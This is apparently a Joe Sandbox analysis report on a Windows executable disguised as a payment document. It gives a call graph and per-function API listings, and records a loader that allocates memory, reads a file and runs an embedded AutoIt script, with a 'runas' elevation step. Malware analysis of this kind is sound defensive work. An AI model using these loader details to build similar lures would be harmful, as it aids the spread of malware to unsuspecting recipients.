98135->98141 98139 922be7 98136->98139 98137->98135 98140 8e33c6 22 API calls 98139->98140 98140->98131 98142 8e2b7a 98141->98142 98158 8e2cd4 7 API calls 98143->98158 98145 8e2b2a 98146 8e2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98145->98146 98146->98124 98148 8e3862 ___scrt_fastfail 98147->98148 98159 8e4212 98148->98159 98152 923386 Shell_NotifyIconW 98153 8e3906 Shell_NotifyIconW 98163 8e3923 98153->98163 98155 8e38e8 98155->98152 98155->98153 98156 8e391c 98156->98132 98157->98135 98158->98145 98160 9235a4 98159->98160 98161 8e38b7 98159->98161 98160->98161 98162 9235ad DestroyIcon 98160->98162 98161->98155 98185 94c874 42 API calls _strftime 98161->98185 98162->98161 98164 8e393f 98163->98164 98183 8e3a13 98163->98183 98165 8e6270 22 API calls 98164->98165 98166 8e394d 98165->98166 98167 923393 LoadStringW 98166->98167 98168 8e395a 98166->98168 98170 9233ad 98167->98170 98169 8e6b57 22 API calls 98168->98169 98171 8e396f 98169->98171 98179 8e3994 ___scrt_fastfail 98170->98179 98186 8ea8c7 22 API calls __fread_nolock 98170->98186 98172 8e397c 98171->98172 98173 9233c9 98171->98173 98172->98170 98174 8e3986 98172->98174 98175 8e6350 22 API calls 98173->98175 98177 8e6350 22 API calls 98174->98177 98178 9233d7 98175->98178 98177->98179 98178->98179 98180 8e33c6 22 API calls 98178->98180 98181 8e39f9 Shell_NotifyIconW 98179->98181 98182 9233f9 98180->98182 98181->98183 98184 8e33c6 22 API calls 98182->98184 98183->98156 98184->98179 98185->98155 98186->98179 98187 8e3156 98190 8e3170 98187->98190 98191 8e3187 98190->98191 98192 8e318c 98191->98192 98193 8e31eb 98191->98193 98194 8e31e9 98191->98194 98197 8e3199 98192->98197 98198 8e3265 PostQuitMessage 98192->98198 98195 922dfb 98193->98195 98196 8e31f1 98193->98196 98199 8e31d0 DefWindowProcW 98194->98199 98239 8e18e2 10 API calls 98195->98239 98200 8e321d SetTimer RegisterWindowMessageW 98196->98200 98201 8e31f8 98196->98201 98203 8e31a4 98197->98203 98204 922e7c 98197->98204 98205 8e316a 98198->98205 98199->98205 98200->98205 98209 8e3246 CreatePopupMenu 98200->98209 98206 922d9c 98201->98206 98207 8e3201 KillTimer 98201->98207 98210 8e31ae 98203->98210 98211 922e68 98203->98211 98244 94bf30 34 API calls ___scrt_fastfail 98204->98244 98219 922da1 98206->98219 98220 922dd7 MoveWindow 98206->98220 98235 8e30f2 Shell_NotifyIconW ___scrt_fastfail 98207->98235 98208 922e1c 98240 8fe499 42 API calls 98208->98240 98209->98205 98216 8e31b9 98210->98216 98217 922e4d 98210->98217 98243 94c161 27 API calls ___scrt_fastfail 98211->98243 98223 8e31c4 98216->98223 98224 8e3253 98216->98224 98217->98199 98242 940ad7 22 API calls 98217->98242 98218 922e8e 98218->98199 98218->98205 98225 922dc6 SetFocus 98219->98225 98226 922da7 98219->98226 98220->98205 98221 8e3214 98236 8e3c50 DeleteObject DestroyWindow 98221->98236 98222 8e3263 98222->98205 98223->98199 98241 8e30f2 Shell_NotifyIconW ___scrt_fastfail 98223->98241 98237 8e326f 44 API calls ___scrt_fastfail 98224->98237 98225->98205 98226->98223 98227 922db0 98226->98227 98238 8e18e2 10 API calls 98227->98238 98233 922e41 98234 8e3837 49 API calls 98233->98234 98234->98194 98235->98221 98236->98205 98237->98222 98238->98205 98239->98208 98240->98223 98241->98233 98242->98194 98243->98222 98244->98218 98245 8e2e37 98246 8ea961 22 API calls 98245->98246 98247 8e2e4d 98246->98247 98324 8e4ae3 98247->98324 98249 8e2e6b 98250 8e3a5a 24 API calls 98249->98250 98251 8e2e7f 98250->98251 98252 8e9cb3 22 API calls 98251->98252 98253 8e2e8c 98252->98253 98254 8e4ecb 94 API calls 98253->98254 98255 8e2ea5 98254->98255 98256 922cb0 98255->98256 98257 8e2ead 98255->98257 98258 952cf9 80 API calls 98256->98258 98338 8ea8c7 22 API calls __fread_nolock 98257->98338 98259 922cc3 98258->98259 98260 922ccf 98259->98260 98262 8e4f39 68 API calls 98259->98262 98265 8e4f39 68 API calls 98260->98265 98262->98260 98263 8e2ec3 98339 8e6f88 22 API calls 98263->98339 98267 922ce5 98265->98267 98266 8e2ecf 98268 8e9cb3 22 API calls 98266->98268 98356 8e3084 22 API calls 98267->98356 98269 8e2edc 98268->98269 98340 8ea81b 41 API calls 98269->98340 98271 8e2eec 98274 8e9cb3 22 API calls 98271->98274 98273 922d02 98357 8e3084 22 API calls 98273->98357 98276 8e2f12 98274->98276 98341 8ea81b 41 API calls 98276->98341 98277 922d1e 98279 8e3a5a 24 API calls 98277->98279 98280 922d44 98279->98280 98358 8e3084 22 API calls 98280->98358 98281 8e2f21 98284 8ea961 22 API calls 98281->98284 98283 922d50 98359 8ea8c7 22 API calls __fread_nolock 98283->98359 98286 8e2f3f 98284->98286 98342 8e3084 22 API calls 98286->98342 98287 922d5e 98360 8e3084 22 API calls 98287->98360 98290 8e2f4b 98343 904a28 40 API calls 3 library calls 98290->98343 98292 922d6d 98361 8ea8c7 22 API calls __fread_nolock 98292->98361 98293 8e2f59 98293->98267 98294 8e2f63 98293->98294 98344 904a28 40 API calls 3 library calls 98294->98344 98297 8e2f6e 98297->98273 98300 8e2f78 98297->98300 98298 922d83 98362 8e3084 22 API calls 98298->98362 98345 904a28 40 API calls 3 library calls 98300->98345 98301 922d90 98303 8e2f83 98303->98277 98304 8e2f8d 98303->98304 98346 904a28 40 API calls 3 library calls 98304->98346 98306 8e2f98 98307 8e2fdc 98306->98307 98347 8e3084 22 API calls 98306->98347 98307->98292 98308 8e2fe8 98307->98308 98308->98301 98350 8e63eb 22 API calls 98308->98350 98311 8e2fbf 98348 8ea8c7 22 API calls __fread_nolock 98311->98348 98313 8e2ff8 98351 8e6a50 22 API calls 98313->98351 98314 8e2fcd 98349 8e3084 22 API calls 98314->98349 98317 8e3006 98352 8e70b0 23 API calls 98317->98352 98321 8e3021 98322 8e3065 98321->98322 98353 8e6f88 22 API calls 98321->98353 98354 8e70b0 23 API calls 98321->98354 98355 8e3084 22 API calls 98321->98355 98325 8e4af0 __wsopen_s 98324->98325 98326 8e6b57 22 API calls 98325->98326 98327 8e4b22 98325->98327 98326->98327 98332 8e4b58 98327->98332 98363 8e4c6d 98327->98363 98329 8e4c6d 22 API calls 98329->98332 98330 8e4c29 98331 8e4c5e 98330->98331 98333 8e9cb3 22 API calls 98330->98333 98331->98249 98332->98329 98332->98330 98334 8e9cb3 22 API calls 98332->98334 98337 8e515f 22 API calls 98332->98337 98335 8e4c52 98333->98335 98334->98332 98336 8e515f 22 API calls 98335->98336 98336->98331 98337->98332 98338->98263 98339->98266 98340->98271 98341->98281 98342->98290 98343->98293 98344->98297 98345->98303 98346->98306 98347->98311 98348->98314 98349->98307 98350->98313 98351->98317 98352->98321 98353->98321 98354->98321 98355->98321 98356->98273 98357->98277 98358->98283 98359->98287 98360->98292 98361->98298 98362->98301 98364 8eaec9 22 API calls 98363->98364 98365 8e4c78 98364->98365 98365->98327 98366 41bf620 98380 41bd270 98366->98380 98368 41bf6e3 98383 41bf510 98368->98383 98370 41bf70c CreateFileW 98372 41bf75b 98370->98372 98373 41bf760 98370->98373 98373->98372 98374 41bf777 VirtualAlloc 98373->98374 98374->98372 98375 41bf795 ReadFile 98374->98375 98375->98372 98376 41bf7b0 98375->98376 98377 41be510 13 API calls 98376->98377 98378 41bf7e3 98377->98378 98379 41bf806 ExitProcess 98378->98379 98379->98372 98386 41c0710 GetPEB 98380->98386 98382 41bd8fb 98382->98368 98384 41bf519 Sleep 98383->98384 98385 41bf527 98384->98385 98387 41c073a 98386->98387 98387->98382 98388 8e1033 98393 8e4c91 98388->98393 98392 8e1042 98394 8ea961 22 API calls 98393->98394 98395 8e4cff 98394->98395 98401 8e3af0 98395->98401 98398 8e4d9c 98399 8e1038 98398->98399 98404 8e51f7 22 API calls __fread_nolock 98398->98404 98400 9000a3 29 API calls __onexit 98399->98400 98400->98392 98405 8e3b1c 98401->98405 98404->98398 98406 8e3b0f 98405->98406 98407 8e3b29 98405->98407 98406->98398 98407->98406 98408 8e3b30 RegOpenKeyExW 98407->98408 98408->98406 98409 8e3b4a RegQueryValueExW 98408->98409 98410 8e3b6b 98409->98410 98411 8e3b80 RegCloseKey 98409->98411 98410->98411 98411->98406

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 234 8e42de-8e434d call 8ea961 GetVersionExW call 8e6b57 239 923617-92362a 234->239 240 8e4353 234->240 242 92362b-92362f 239->242 241 8e4355-8e4357 240->241 243 8e435d-8e43bc call 8e93b2 call 8e37a0 241->243 244 923656 241->244 245 923632-92363e 242->245 246 923631 242->246 262 8e43c2-8e43c4 243->262 263 9237df-9237e6 243->263 249 92365d-923660 244->249 245->242 248 923640-923642 245->248 246->245 248->241 251 923648-92364f 248->251 252 923666-9236a8 249->252 253 8e441b-8e4435 GetCurrentProcess IsWow64Process 249->253 251->239 255 923651 251->255 252->253 256 9236ae-9236b1 252->256 258 8e4437 253->258 259 8e4494-8e449a 253->259 255->244 260 9236b3-9236bd 256->260 261 9236db-9236e5 256->261 264 8e443d-8e4449 258->264 259->264 265 9236ca-9236d6 260->265 266 9236bf-9236c5 260->266 268 9236e7-9236f3 261->268 269 9236f8-923702 261->269 262->249 267 8e43ca-8e43dd 262->267 270 923806-923809 263->270 271 9237e8 263->271 272 8e444f-8e445e LoadLibraryA 264->272 273 923824-923828 GetSystemInfo 264->273 265->253 266->253 276 923726-92372f 267->276 277 8e43e3-8e43e5 267->277 268->253 279 923704-923710 269->279 280 923715-923721 269->280 281 9237f4-9237fc 270->281 282 92380b-92381a 270->282 278 9237ee 271->278 274 8e449c-8e44a6 GetSystemInfo 272->274 275 8e4460-8e446e GetProcAddress 272->275 284 8e4476-8e4478 274->284 275->274 283 8e4470-8e4474 GetNativeSystemInfo 275->283 287 923731-923737 276->287 288 92373c-923748 276->288 285 8e43eb-8e43ee 277->285 286 92374d-923762 277->286 278->281 279->253 280->253 281->270 282->278 289 92381c-923822 282->289 283->284 292 8e447a-8e447b FreeLibrary 284->292 293 8e4481-8e4493 284->293 294 923791-923794 285->294 295 8e43f4-8e440f 285->295 290 923764-92376a 286->290 291 92376f-92377b 286->291 287->253 288->253 289->281 290->253 291->253 292->293 294->253 296 92379a-9237c1 294->296 297 923780-92378c 295->297 298 8e4415 295->298 299 9237c3-9237c9 296->299 300 9237ce-9237da 296->300 297->253 298->253 299->253 300->253
                                                                              APIs
                                                                              • GetVersionExW.KERNEL32(?), ref: 008E430D
                                                                                • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                              • GetCurrentProcess.KERNEL32(?,0097CB64,00000000,?,?), ref: 008E4422
                                                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 008E4429
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 008E4454
                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008E4466
                                                                              • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 008E4474
                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 008E447B
                                                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 008E44A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                              • API String ID: 3290436268-3101561225
                                                                              • Opcode ID: b6c6e08a9c2c21f0e56a03c305565724206e58cb6f9309d4abc579037f9f06d2
                                                                              • Instruction ID: 8b9d0b73634e9a2dae175b204fd3060636daca614b9bb1f12b6a88ae64ac4ea0
                                                                              • Opcode Fuzzy Hash: b6c6e08a9c2c21f0e56a03c305565724206e58cb6f9309d4abc579037f9f06d2
                                                                              • Instruction Fuzzy Hash: 9CA1386293E3D4CFCB11C7797E611993FE8BB23324B8896ACE045D3B65F2240544EB25

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 553 8e42a2-8e42ba CreateStreamOnHGlobal 554 8e42bc-8e42d3 FindResourceExW 553->554 555 8e42da-8e42dd 553->555 556 8e42d9 554->556 557 9235ba-9235c9 LoadResource 554->557 556->555 557->556 558 9235cf-9235dd SizeofResource 557->558 558->556 559 9235e3-9235ee LockResource 558->559 559->556 560 9235f4-9235fc 559->560 561 923600-923612 560->561 561->556
                                                                              APIs
                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008E50AA,?,?,00000000,00000000), ref: 008E42B2
                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008E50AA,?,?,00000000,00000000), ref: 008E42C9
                                                                              • LoadResource.KERNEL32(?,00000000,?,?,008E50AA,?,?,00000000,00000000,?,?,?,?,?,?,008E4F20), ref: 009235BE
                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,008E50AA,?,?,00000000,00000000,?,?,?,?,?,?,008E4F20), ref: 009235D3
                                                                              • LockResource.KERNEL32(008E50AA,?,?,008E50AA,?,?,00000000,00000000,?,?,?,?,?,?,008E4F20,?), ref: 009235E6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                              • String ID: SCRIPT
                                                                              • API String ID: 3051347437-3967369404
                                                                              • Opcode ID: 15b357c303f6fee8be88a3c7a20a76786c0ccee08f45a49234efe3b1c0df2225
                                                                              • Instruction ID: 590c1de4852fdfe1458c5ed16eb2fdb8e6ac4c7853d34a2e057876c0959eacdc
                                                                              • Opcode Fuzzy Hash: 15b357c303f6fee8be88a3c7a20a76786c0ccee08f45a49234efe3b1c0df2225
                                                                              • Instruction Fuzzy Hash: 67117CB1200701BFD7218B66DC48F677BB9EBC6B51F14816DB51AD6260DBB2D8409620

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008E2B6B
                                                                                • Part of subcall function 008E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009B1418,?,008E2E7F,?,?,?,00000000), ref: 008E3A78
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                              • GetForegroundWindow.USER32(runas,?,?,?,?,?,009A2224), ref: 00922C10
                                                                              • ShellExecuteW.SHELL32(00000000,?,?,009A2224), ref: 00922C17
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                              • String ID: runas
                                                                              • API String ID: 448630720-4000483414
                                                                              • Opcode ID: 73ccaa3217b755507551c04851331623459df457cfa8cc4dc227c9754c98f46e
                                                                              • Instruction ID: d6d2c85ba532d3c0591ee8d83147d0cabd1a42942c63eadf50503f760bbb7c86
                                                                              • Opcode Fuzzy Hash: 73ccaa3217b755507551c04851331623459df457cfa8cc4dc227c9754c98f46e
                                                                              • Instruction Fuzzy Hash: 7811D231208381AAC714FF2AE8559AE77A9FBD3760F84042CF086931B2DF208A499753
                                                                              APIs
                                                                              • GetInputState.USER32 ref: 008ED807
                                                                              • timeGetTime.WINMM ref: 008EDA07
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008EDB28
                                                                              • TranslateMessage.USER32(?), ref: 008EDB7B
                                                                              • DispatchMessageW.USER32(?), ref: 008EDB89
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008EDB9F
                                                                              • Sleep.KERNEL32(0000000A), ref: 008EDBB1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                              • String ID:
                                                                              • API String ID: 2189390790-0
                                                                              • Opcode ID: 07a59283f453ada26634326a8d187a728b75726562852d7ab77a58550cd40015
                                                                              • Instruction ID: 606a4f97238b29dd2b4339b2846161f1523580555396fbf6b47f8476b19d9345
                                                                              • Opcode Fuzzy Hash: 07a59283f453ada26634326a8d187a728b75726562852d7ab77a58550cd40015
                                                                              • Instruction Fuzzy Hash: 2542C070608385AFD728DF25C844B6ABBE4FF86314F14862DE595CB292D774E848DF82

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 008E2D07
                                                                              • RegisterClassExW.USER32(00000030), ref: 008E2D31
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E2D42
                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 008E2D5F
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E2D6F
                                                                              • LoadIconW.USER32(000000A9), ref: 008E2D85
                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E2D94
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                              • API String ID: 2914291525-1005189915
                                                                              • Opcode ID: 84bd0ba942810d32877fe66d4df557deba8be7217076e6e9bb714000d892588b
                                                                              • Instruction ID: 942c88f49fb453c701acbbc8653048d6ad21f8bf8af2fc02d832067247881dd9
                                                                              • Opcode Fuzzy Hash: 84bd0ba942810d32877fe66d4df557deba8be7217076e6e9bb714000d892588b
                                                                              • Instruction Fuzzy Hash: C62124B2925348AFDB00DFA4ED59BDDBBB4FB08711F00821AF615A62A0D7B00584EF90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 302 92065b-92068b call 92042f 305 9206a6-9206b2 call 915221 302->305 306 92068d-920698 call 90f2c6 302->306 311 9206b4-9206c9 call 90f2c6 call 90f2d9 305->311 312 9206cb-920714 call 92039a 305->312 313 92069a-9206a1 call 90f2d9 306->313 311->313 321 920781-92078a GetFileType 312->321 322 920716-92071f 312->322 323 92097d-920983 313->323 324 9207d3-9207d6 321->324 325 92078c-9207bd GetLastError call 90f2a3 CloseHandle 321->325 327 920721-920725 322->327 328 920756-92077c GetLastError call 90f2a3 322->328 331 9207d8-9207dd 324->331 332 9207df-9207e5 324->332 325->313 339 9207c3-9207ce call 90f2d9 325->339 327->328 333 920727-920754 call 92039a 327->333 328->313 336 9207e9-920837 call 91516a 331->336 332->336 337 9207e7 332->337 333->321 333->328 344 920847-92086b call 92014d 336->344 345 920839-920845 call 9205ab 336->345 337->336 339->313 352 92087e-9208c1 344->352 353 92086d 344->353 345->344 351 92086f-920879 call 9186ae 345->351 351->323 355 9208e2-9208f0 352->355 356 9208c3-9208c7 352->356 353->351 359 9208f6-9208fa 355->359 360 92097b 355->360 356->355 358 9208c9-9208dd 356->358 358->355 359->360 361 9208fc-92092f CloseHandle call 92039a 359->361 360->323 364 920963-920977 361->364 365 920931-92095d GetLastError call 90f2a3 call 915333 361->365 364->360 365->364
                                                                              APIs
                                                                                • Part of subcall function 0092039A: CreateFileW.KERNELBASE(00000000,00000000,?,00920704,?,?,00000000,?,00920704,00000000,0000000C), ref: 009203B7
                                                                              • GetLastError.KERNEL32 ref: 0092076F
                                                                              • __dosmaperr.LIBCMT ref: 00920776
                                                                              • GetFileType.KERNELBASE(00000000), ref: 00920782
                                                                              • GetLastError.KERNEL32 ref: 0092078C
                                                                              • __dosmaperr.LIBCMT ref: 00920795
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009207B5
                                                                              • CloseHandle.KERNEL32(?), ref: 009208FF
                                                                              • GetLastError.KERNEL32 ref: 00920931
                                                                              • __dosmaperr.LIBCMT ref: 00920938
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                              • String ID: H
                                                                              • API String ID: 4237864984-2852464175
                                                                              • Opcode ID: 3099861adfad2524f7d0324181fb61fc7d755f688709e6821afeb760b9572a5a
                                                                              • Instruction ID: d3af1514111fb37a028cea2d529a03655bb4e0ef0baac0ec9ad1ac26d435c06e
                                                                              • Opcode Fuzzy Hash: 3099861adfad2524f7d0324181fb61fc7d755f688709e6821afeb760b9572a5a
                                                                              • Instruction Fuzzy Hash: 7EA14632A141188FDF19EF68EC51BAE3BA4AB86320F14025DF8159B3D2D7319D53DB91

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 008E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009B1418,?,008E2E7F,?,?,?,00000000), ref: 008E3A78
                                                                                • Part of subcall function 008E3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008E3379
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008E356A
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0092318D
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009231CE
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00923210
                                                                              • _wcslen.LIBCMT ref: 00923277
                                                                              • _wcslen.LIBCMT ref: 00923286
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                              • API String ID: 98802146-2727554177
                                                                              • Opcode ID: 6fdca58ae0d75f49b7affc0c61804b139960a08f5348e89a5fafc9282b167cc3
                                                                              • Instruction ID: 9f3d67021182b9fc4cf99519f472f2421a1779927b8b7a5d164beca65aa40188
                                                                              • Opcode Fuzzy Hash: 6fdca58ae0d75f49b7affc0c61804b139960a08f5348e89a5fafc9282b167cc3
                                                                              • Instruction Fuzzy Hash: 9071F3714183009FC314EF29ED8596BBBE8FF86B50F404A2EF555C71A0EB349A48CB62

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 008E2B8E
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 008E2B9D
                                                                              • LoadIconW.USER32(00000063), ref: 008E2BB3
                                                                              • LoadIconW.USER32(000000A4), ref: 008E2BC5
                                                                              • LoadIconW.USER32(000000A2), ref: 008E2BD7
                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008E2BEF
                                                                              • RegisterClassExW.USER32(?), ref: 008E2C40
                                                                                • Part of subcall function 008E2CD4: GetSysColorBrush.USER32(0000000F), ref: 008E2D07
                                                                                • Part of subcall function 008E2CD4: RegisterClassExW.USER32(00000030), ref: 008E2D31
                                                                                • Part of subcall function 008E2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E2D42
                                                                                • Part of subcall function 008E2CD4: InitCommonControlsEx.COMCTL32(?), ref: 008E2D5F
                                                                                • Part of subcall function 008E2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E2D6F
                                                                                • Part of subcall function 008E2CD4: LoadIconW.USER32(000000A9), ref: 008E2D85
                                                                                • Part of subcall function 008E2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E2D94
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
